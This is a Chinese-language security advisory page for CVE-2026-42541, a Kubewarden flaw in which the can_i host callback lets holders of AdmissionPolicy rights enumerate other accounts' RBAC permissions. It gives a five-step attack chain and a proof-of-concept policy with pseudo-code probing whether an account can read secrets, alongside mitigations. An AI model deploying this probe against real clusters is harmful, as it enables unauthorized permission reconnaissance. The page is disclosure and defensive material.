IPBUF安全漏洞报告
English
CVE-2026-42541 CVSS 4.3 中危

CVE-2026-42541 Kubewarden 信息泄露与权限枚举漏洞

披露日期: 2026-05-12
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-42541
漏洞类型
信息泄露
CVSS评分
4.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Kubewarden

相关标签

KubernetesKubewarden信息泄露权限枚举RBACCVE-2026-42541

漏洞概述

Kubewarden是Kubernetes策略引擎。在特定版本前,拥有创建AdmissionPolicy权限的攻击者可利用can_i主机回调漏洞。攻击者能构造策略执行SubjectAccessReview请求,绕过上下文感知允许列表,枚举集群内任意用户或服务账户的RBAC权限。该漏洞属于信息泄露,导致攻击者能获取如获取Secrets等权限信息。

技术细节

漏洞源于Kubewarden策略引擎中的can_i主机回调机制未正确执行上下文感知允许列表检查。攻击者若拥有创建AdmissionPolicy或AdmissionPolicyGroup的权限(非默认权限),可精心制作恶意策略,利用can_i回调发起SubjectAccessReview (SAR) 请求。由于回调直接将请求转发给处理程序,并使用策略服务器的高特权执行真实的SAR,攻击者可通过此机制探测集群内任意用户或服务账户的权限(如是否可get secrets或create pods)。这导致了策略级授权缺口,虽不直接泄露工作负载数据,但可进行权限侦察。

攻击链分析

STEP 1
步骤1
攻击者获取集群中创建AdmissionPolicy或AdmissionPolicyGroup的特权权限。
STEP 2
步骤2
攻击者编写并部署一个恶意Kubewarden策略,该策略在逻辑中调用can_i主机回调。
STEP 3
步骤3
策略被加载到策略服务器中,等待流量触发或主动探测。
STEP 4
步骤4
策略执行时利用can_i回调向Kubernetes API Server发送SubjectAccessReview请求,查询目标用户权限。
STEP 5
步骤5
策略服务器利用自身高特权完成查询并返回结果,攻击者根据策略判定结果获取权限信息,完成侦察。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# Example Policy Definition demonstrating the exploit logic apiVersion: policies.kubewarden.io/v1 kind: AdmissionPolicy metadata: name: rbac-recon-policy spec: module: registry://ghcr.io/kubewarden/policies/recon-policy:v1 # The policy utilizes the vulnerable 'can_i' callback # to probe permissions of other users within the cluster. rules: - apiGroups: [""] resources: ["pods"] operations: ["CREATE"] mutating: false # Settings passed to the WASM module to trigger the check settings: target_user: "system:anonymous" check_verb: "get" check_resource: "secrets" # Inside the WASM module (e.g. Rego pseudo-code): # package verify # import future.keywords.if # default allow = false # allow if { # # Trigger the vulnerable callback # response := can_i({ # "user": input.settings.target_user, # "verb": input.settings.check_verb, # "resource": input.settings.check_resource # }) # response.allowed # }

影响范围

Kubewarden (修复版本之前的所有版本)

防御指南

临时缓解措施
在未升级前,应严格审查并限制拥有策略创建权限的账户,确保仅受信任的管理员可部署Kubewarden策略。同时监控策略服务器的日志,查找异常的SubjectAccessReview请求。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表